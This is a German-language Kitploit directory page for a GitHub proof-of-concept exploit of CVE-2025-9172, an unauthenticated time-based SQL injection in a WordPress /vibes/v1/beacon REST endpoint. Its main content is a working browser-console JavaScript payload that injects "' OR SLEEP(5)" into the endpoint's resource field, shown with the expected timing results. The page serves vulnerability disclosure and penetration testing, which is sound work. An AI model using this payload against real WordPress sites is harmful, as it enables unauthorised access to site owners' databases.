Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9172 — Proof-of-concept-Exploit für eine nicht authentifizierte zeitbasierte SQL-Injection-Schwachstelle im WordPress /vibes/v1/beacon REST-Endpunkt, mit Browser-Konsole PoC, der SLEEP-basierte Injection demonstriert. | Kitploit
Tools/GitHubGitHub/jfriedli/cve-2025-9172
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjfriedli/cve-2025-9172

CVE-2025-9172

Proof-of-concept-Exploit für eine nicht authentifizierte zeitbasierte SQL-Injection-Schwachstelle im WordPress /vibes/v1/beacon REST-Endpunkt, mit Browser-Konsole PoC, der SLEEP-basierte Injection demonstriert.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit: Zeitbasierte SQL-Injection über /vibes/v1/beacon (nicht authentifiziert)

Browser Console PoC

root@kitploit:~
(async () => {
  const url = 'http://localhost/wordpress/index.php?rest_route=/vibes/v1/beacon';

  async function send(resource) {
    const body = {
      type: 'navigation',
      resource, // injected into SQL (unprepared)
      authenticated: 0,
      metrics: [{ name: 'wait', start: 1, duration: 1 }]
    };

    const t0 = performance.now();

    const res = await fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(body)
    });

    await res.text();

    return {
      status: res.status,
      ms: Math.round(performance.now() - t0)
    };
  }

  console.log('Baseline (fast)…');
  console.log(await send('/a/b/c')); // expected: ~20–50ms

  console.log('Injected (time-based)…');
  console.log(await send("/a/b/c' OR SLEEP(5) OR 'x/dummy")); // expected: ~5000ms
})();

Erwartetes Ergebnis

root@kitploit:~
Baseline: { status: 202, ms: ~20–50 }
Injected: { status: 202, ms: ~5000+ }
Tool herunterladen